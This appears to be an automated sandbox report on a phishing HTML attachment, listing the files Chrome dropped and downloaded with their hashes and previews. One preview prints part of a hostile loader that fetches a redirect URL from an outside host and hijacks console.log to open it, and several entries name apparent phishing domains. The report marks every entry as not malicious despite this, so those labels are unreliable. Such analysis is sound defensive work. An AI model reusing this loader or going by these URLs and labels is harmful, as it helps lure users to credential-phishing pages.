                          URL:https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMENTUM/NOW.API.JS
                          Preview:..const urlx = 'https://natrium100gram.site/public/api/page/redirect';..... // Function to perform GET request. async function fetchData() {. try {. . const response = await fetch(urlx);.. if (!response.ok) {. throw new Error('Network response was not ok');. }.. . const data = await response.json();. . const message = data.message;.. return message ;.. . let messageUrl = message;.. } catch (error) {. // Handle errors. console.error('There was a problem with the fetch operation:', error);. }. }... async function run() {. console.log("readya!");. let key = "";. let jk = "";. const originalConsoleLog = console.log;. console.log = function(message) {. window.open(message,"_se
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):209
                          Entropy (8bit):4.924438477368104
                          Encrypted:false
                          SSDEEP:
                          MD5:72F5925266AB63756C0BA54F77DB6A5A
                          SHA1:73DAF7DC80EF2EDB9D17DA52D9D11BCDA722023E
                          SHA-256:30D4A9532FB69D172EEC610A25B65435EF7FC506ACCD402D94CB9D9003B80812
                          SHA-512:0EFF0ACF78D520AE186EA5D66A9F7E4C4B70F8C761C9263FD26EF12DF912BDAA01A76C340052AE6A9B5BB73B4EF37F170795EAD93F47AE6DDB4757903E83526B
                          Malicious:false
                          Reputation:unknown
                          Preview:{"id":428,"key":"minded","username":"Minded","url_target":"https:\/\/topimo.trilidarn.ru\/kyVPsDa\/#M","optional_url":null,"created_at":"2025-01-09T19:41:31.000000Z","updated_at":"2025-02-07T19:41:31.000000Z"}
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:dropped
                          Size (bytes):89501
                          Entropy (8bit):5.289893677458563
                          Encrypted:false
                          SSDEEP:
                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                          Malicious:false
                          Reputation:unknown
                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                          Category:downloaded
                          Size (bytes):5257
                          Entropy (8bit):7.948766123667811
                          Encrypted:false
                          SSDEEP:
                          MD5:EC900B231DAE815BD4494E2276AC49BB
                          SHA1:F59A1F67C6B5FA3D56B100F967A3AEBF647A49F5
                          SHA-256:134A336966FE60E892C78A228B50CC03CF32141761E6EE30822B195D688BDBE3
                          SHA-512:CFE1EAD74330493E7A4048E65AE30FE30B44F4FFF5E682AC8624C8B6D1D28471BA18CE165A386CF370B0487EA6C40B11544475F07C7AFCD4C2891455317396BD
                          Malicious:false
                          Reputation:unknown
                          URL:https://topimo.trilidarn.ru/kyVPsDa/
                          Preview:(./..X...C.=..hH...\.....,.Oj".../..\n0...Bs.<..0^..b<.A......d.. ..\.n.'..S....J.......8......T...{l.J.UK.*.E...#0&........:|....V...W........nOM.......<...s.d.y.JK.&Y..>b....\.I.7.......1...N|=...T.}*7.".Gny.NF.Dk.,.;.....*PW......M.5...kX..D.PH.c..o.....j."..}nKO..v.E.n.+.Q.:.'..RC.J...4....N.q...PY.....F.K.Q..p......cW........kf..j=4,........A..3.u..e..8.....Mx..t~.H..../q...=....).......WCf9....t..q../F..I..T[.Ss.T"/...P."i.N.e......k...9.....7.B...>...$..v..,..Y.8.sP%v.......t..0x.p"..".....p.Pm..-$Ob.Qn...q],jw.......g.........j.n>Y.ly3U....W..[.J/mp..K>:..".*i.........k.Z*{..}.;.Jw.,w.c.T..T...=..>...c.{.Y.......;..O..*...........W+..c.r......p...DE.L=.?v......|...x.0h2"...?).k.h..f..F... ^.....Tz.d.c.}......=.I......k......"t.".n...S.lr.>.N..k`2"....b..v%...-.|.../AZ~.y~...u..=....+......n.........fy...........qMZ....J..>.....6..V....l..H...K. .8.....`). r~_.a.~fGR.I.pE.,@r.....8L....f..@........G.`.....X..a.}.e}.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (47520)
                          Category:dropped
                          Size (bytes):47521
                          Entropy (8bit):5.3981340461317835
                          Encrypted:false
                          SSDEEP:
                          MD5:7C92EC9D1395055CE0405A32607C7291
                          SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                          SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                          SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:data
                          Category:downloaded
                          Size (bytes):1687
                          Entropy (8bit):7.890036990726315
                          Encrypted:false
                          SSDEEP:
                          MD5:9CAE9AF90A18F887B3838A15D3BBEBED
                          SHA1:2E2757699E40E77016B9C2E4FAB8BE3780296BC1
                          SHA-256:27915C2D5FBF0D17288393D8E7FAFE3EA1C87B420308E158597452FDADDE213C
                          SHA-512:C0870B9D88B1E3829E35EB2CE59F476C5057DE86F2DC2E587C344D8AF97391F5C09EB6CD8913C51C817D22FA8246F0BD8635B7DE198BA558724405B761E72E13
                          Malicious:false
                          Reputation:unknown
                          URL:https://pending-revew.pages.dev/
                          Preview:c.Hn.@............cu.J..*._..E.5B....$.b.Wk.}.=.p.hwK._.E.r. K.D..y......5.c9.3.]O...(}..... $)..=.j....X.Z.^.k.L...Q.?....AP.m.a...B.._....5:r^`#..9g...%.}...Fj....Z. .u5yD.p....Y...u.n...et....ZL...g.o>...A...\...]..n.o..po.\..z.t....:L...t.....s.:T...y..r..'D...U.......#..........G..<...K%.v.w.............fx.4!........3.....lF...4...@LB$..x..~..%.......j.0.B......E.....8%7M....x.*_.#.G...9/p....I...yE.V.H.}.F...R.B.g>!.$.R.K....n.{o.....9.O..;..c ......SC.b.VT......@..r.oW.yG.^.`>L.q.&H.n..1M*....&.....?.. ..?.V.../..tYc,.7..b....z.E.c.@{..j..k..\eX.yq..l.}.%E....$.>.*o.....yE.....@.n..-~LC...SA..OO..3..`X.b.\.K8....2....r.K.....%'.-X`............I.7~.z....7......'..RI.yo?..x.~l..U5.W..S...-..b..3V....sPQ+M2....=.4...>..}.T.j...;+.m.. ...."..mR..E..yJ.....\..,.o..x......q..mVN..%......6,c{..>.r:./.."M..r,.Y.....XF.2...a....KX...K.r......KIx..v~*.?...?'.~6....SPR;..be.O.:.Yn|....Y.....,s.....q.~..^..b..vPln..........mX...C..>Ex....
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):61
                          Entropy (8bit):3.990210155325004
                          Encrypted:false
                          SSDEEP:
                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                          Malicious:false
                          Reputation:unknown
                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                          Category:downloaded
                          Size (bytes):13
                          Entropy (8bit):3.5465935642949384
                          Encrypted:false
                          SSDEEP:
                          MD5:E09C3D77EF897191660B908218F413E1
                          SHA1:DE4597455EFFC2623C3FD6B69FA812A66C475100
                          SHA-256:355382ACC32B88120E9126B76F46642081AC688504FA6534980405B2942C4D9F
                          SHA-512:3E696F02546C8263507A4572AE9ABB0754409F98BA4C6848901F08BFF310D8CF0D0660F822EB3BFB58C368FD5E747924C5BC2253069B1A652E32E9DAD64AF64A
                          Malicious:false
                          Reputation:unknown
                          URL:https://topimo.trilidarn.ru/favicon.ico
                          Preview:(./..X......Q
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 48 x 67, 8-bit/color RGB, non-interlaced
                          Category:downloaded
                          Size (bytes):61
                          Entropy (8bit):4.068159130770306
                          Encrypted:false
                          SSDEEP:
                          MD5:60E63C1CE940BB5DE85E20E02D5880DD
                          SHA1:36875AA9AE31F7351F02CABB986EB970A0AACE3D
                          SHA-256:9A7A2E71FA238186DA55988D58DED5D3E1D2D782B3741D0E7649A1428ED4A21F
                          SHA-512:E0C1A442BDD48BC8877BED57F372012AB4778CB3423CFB477077FCA74E27A79C66F78510BB44D02FE8A801F27B83AA975D6540CEDA1B91E6017E1BCBF52DA34D
                          Malicious:false
                          Reputation:unknown
                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/9028ef0719b60f73/1736976279663/LDCu1Lyoc0xujrc
                          Preview:.PNG........IHDR...0...C.....U.......IDAT.....$.....IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (48316), with no line terminators
                          Category:downloaded
                          Size (bytes):48316
                          Entropy (8bit):5.6346993394709
                          Encrypted:false
                          SSDEEP:
                          MD5:2CA03AD87885AB983541092B87ADB299
                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                          Malicious:false
                          Reputation:unknown
                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):78
                          Entropy (8bit):4.3818424507205185
                          Encrypted:false
                          SSDEEP:
                          MD5:871B4DF854B06DFB3A615FD61ECC7490
                          SHA1:8B6D66569748C631D5F11EC79320A55A4E8D5898
                          SHA-256:C2F98625602B952B42A41C21999DD9522E4B12B2FC6E75AB05DF491B5D8EF0EC
                          SHA-512:314744BB3D227522284F702D73F2968E0856882E1497EE10E4B2F1D6FC39746D2C823A6259878A92A828535AAAAB65A6196A6F2C61F1B376A3190EA1C2A9B5AF
                          Malicious:false
                          Reputation:unknown
                          Preview:{"status":"success","message":"https:\/\/pending-revew.pages.dev\/#?service="}
                          File type:HTML document, ASCII text, with very long lines (424), with CRLF line terminators
                          Entropy (8bit):4.624444587005303
                          TrID:
                          • HyperText Markup Language (15015/1) 20.56%
                          • HyperText Markup Language (12001/1) 16.44%
                          • HyperText Markup Language (12001/1) 16.44%
                          • HyperText Markup Language (11501/1) 15.75%
                          • HyperText Markup Language (11501/1) 15.75%
                          File name:A_C_H_JAN14.htm
                          File size:6'676 bytes
                          MD5:1df9751c6e80d2f2a9fa3c926e118317
                          SHA1:e89c7c6e532e82d7bf2d1471a061a9b29258819e
                          SHA256:916859eff63990aa5fe16534bf4fbab689af37db673be426289f6bfdba68abc7
                          SHA512:d0e42467c4814a6099fbeaa007974a16609abccd8a23fdfda2cf504a126eea9ccf9a759966edbfba5da0aa4af2c88b106c33a4a46d9b5c970cb659cdf49c79ab
                          SSDEEP:48:thQ2hqMj9VQwpivTD3F7Xn/lDM+RUafaCU7bMGVTxZG6XvALII5n63xs4IUbyLcI:ThCvvXFBVUayJrq6/fI5nm7WLUWt1co
                          TLSH:A1D174002CA9511542B792724B33E50AFF6267271301D399BBEDD7460FF79248AA7AEC
                          File Content Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Loading Document - Enhanced</title>.. <style>.. body {.. margin: 0;..
                          Icon Hash:1270ce868a8686b8